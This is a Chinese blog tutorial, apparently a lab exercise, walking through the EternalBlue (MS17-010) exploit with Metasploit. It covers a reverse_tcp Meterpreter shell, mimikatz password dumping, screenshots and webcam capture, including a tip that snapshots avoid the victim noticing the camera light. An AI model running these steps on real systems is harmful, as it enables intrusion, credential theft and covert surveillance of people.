永恒之蓝复现(CVE-2017-0146)

最新推荐文章于 2023-09-21 22:38:12 发布
最新推荐文章于 2023-09-21 22:38:12 发布
阅读量250 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ga421739102/article/details/103112343
版权

文章目录

测试环境

靶机 Server 2008 R2
攻击机kali

操作步骤

1、启动msf

msfconsole

在这里插入图片描述
2、搜索 ms17-010 模块

search ms17-010

在这里插入图片描述
1、利用模块1来检测是否有此漏洞

use auxiliary/scanner/smb/smb_ms17_010 
set rhost 受害者IP
run

在这里插入图片描述

2、利用模块2来进行攻击
查看需要配置的信息

use exploit/windows/smb/ms17_010_eternalblue 

show options

在这里插入图片描述
设置受害者的IP:

set rhost 受害者IP

设置监听者IP

set lhost 监听者KaliIP

设置payload

set payload windows/x64/meterpreter/reverse_tcp

启动 run 或exploit

run

拿shell
在这里插入图片描述
解决乱码情况

chcp 65001

在这里插入图片描述

在Meterpreter上的一些别的操作

1、截屏

screenshot

在这里插入图片描述
2、获取系统密码
加载mimikatz模块

load mimikatz

在这里插入图片描述
获取用户密码

wdigest

在这里插入图片描述
3、开启摄像头
检测有没有摄像头

webcam_list

在这里插入图片描述
打开摄像头

webcam_stream

打开摄像头,灯会一直亮着,容易被发现
在这里插入图片描述
Ctrl + C 退出,(关闭摄像头)
在这里插入图片描述
拍照

webcam_snap

拍照,摄像头的灯只是一闪而过。没那么容易发现
在这里插入图片描述

烦恼随风飘
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试笔记] 28.复现CVE-2017-0146(永恒之蓝)
H4ppyD0g的博客
02-06 3211
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! 第一次复现漏洞,感觉好好玩 ???? 永恒之蓝编号CVE-2017-0146,可通过MS17-010补丁修补此漏洞 CVE可以看成一个漏洞字典,用来给广泛认同的信息安全漏洞等提供一个公共的名称。通过使用同一个名称,可以在各自独立的漏洞库中起到一定的兼容性效果,并帮助在各个漏洞库中找到相关修补信息。 MS17-010是微软的一个安全类型的补...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
永恒之蓝漏洞复现(CVE-2017-0146)
qq_58000413的博客
04-03 4653
前言 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 原理分析: 利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞
永恒之蓝漏洞复现-CVE-2017-0144
weixin_51583379的博客
11-01 574
终端内输入 set rhosts 192.168.81.0/24 (设置扫描当前网段 可以通过 在终端内输入ip a 查看)配置模块 show options 配置靶机 set rhost 192.168.3.8 这里IP填第五步探测到的IP。使用 模块 use exploit/windows/smb/ms17_010_eternalblue。终端内输入 use auxiliary/scanner/smb/smb_ms17_010。开始利用首先在终端里输入 search ms17_010。
CVE-2017-0143永恒之蓝复现
Welcome To Myon'Blog !
12-22 494
CVE-2017-0143永恒之蓝复现 漏洞复现 永恒之蓝 win7漏洞 kali渗透
永恒之蓝_CVE-2017-0143_漏洞复现/验证
18年开始,学2.5年编程(C、JAVA),学2.5年网络(RS、WLAN),现在来到2023年,转行网络安全。
03-06 1412
永恒之蓝CVE-2017-0143,漏洞验证/复现
永恒之蓝(CVE-2017-0146)复现(超详细)
轻舟已过万重山
09-21 4028
大家好,这是我来到CSDN创作的第二篇博客,我在进行实战模拟时跟大家一样,找到的教程,资料都是参差不齐,要么文章含金量不高,要么不详细,跳过了很多步骤,导致我们在实战复现的过程中,遭遇了各种各样的阻碍,但是我们在搜索相关报错信息时又找不到资料,整个安全圈的技术属于只对圈内开放,难住了很多想要入门的小伙伴,所以在此之后,我会将我自己的学习路线和每次实战的思路,以及遇到的问题,都写成博客,希望能够帮到大家,也希望有大神来指导指导我,大家一起共同进步。
永恒之蓝-MS17010 CVE-2017-0146
星虐
12-31 6864
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。 ...
永恒之蓝漏洞(CVE-2017-0144)复现
LRainner的博客
03-04 4593
永恒之蓝漏洞(CVE-2017-0144)复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
入门级简单的复现永恒之蓝(CVE-2017-0146)
来到了学渣的博客
12-21 1795
入门级的复现永恒之蓝(CVE-2017-0146) 实验设备与软件环境: Kali-2016系统 IP:192.168.10.140 Win7系统 IP:192.168.10.132 开放端口:445 MSF框架版本:5.0.59版本 开始练手 信息收集: Kali先进入msfconsle,然后用nmap -sV 192.168.10.132 扫描win7...
【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8121
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞,iis服务提权工具。
物联网工程_基于RFID的食堂食品安全监测系统设计.docx
07-20
物联网工程_基于RFID的食堂食品安全监测系统设计
VisualSVN-VS2022
最新发布
07-20
VisualSVN-VS2022-8.0.5.vsix SVNVS插件,使用VS自带更新速度太慢,可下载后直接安装即可
基于PSO优化的BP神经网络训练与测试matlab仿真,包括程序,注释,参考文献,操作步骤
07-20
1.版本:matlab2022A。 2.包含:程序,中文注释,参考文献,仿真操作步骤(使用windows media player播放)。 3.领域:PSO优化的BP神经网络 4.仿真效果:仿真效果可以参考博客同名文章《基于PSO优化的BP神经网络训练与测试matlab仿真》 5.内容:基于PSO优化的BP神经网络训练与测试matlab仿真。粒子群优化(Particle Swarm Optimization, PSO)结合BP(Backpropagation)神经网络是一种常见的优化方法,用于提升神经网络的学习能力和泛化能力。PSO不仅帮助BP神经网络找到了一个较好的初始解,从而可能加快了训练过程并提高了最终模型的质量,而且还能探索到更广泛的解空间,有助于避免局部最优解。 6.注意事项:注意MATLAB左侧当前文件夹路径,必须是程序所在文件夹位置,具体可以参考视频录。
超详细讲C++cout语句
07-20
超详细讲C++cout语句,专门为C++初学者录制。
cve-2017-9841复现
07-27
如果您想复现CVE-2017-9841漏洞,您需要使用受影响版本的PHPUnit,并将编写器模块放置在Web可访问目录中。然后,您可以通过向php://input发送恶意代码来利用该漏洞。请注意,复现漏洞是违法行为,且可能会对系统造成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值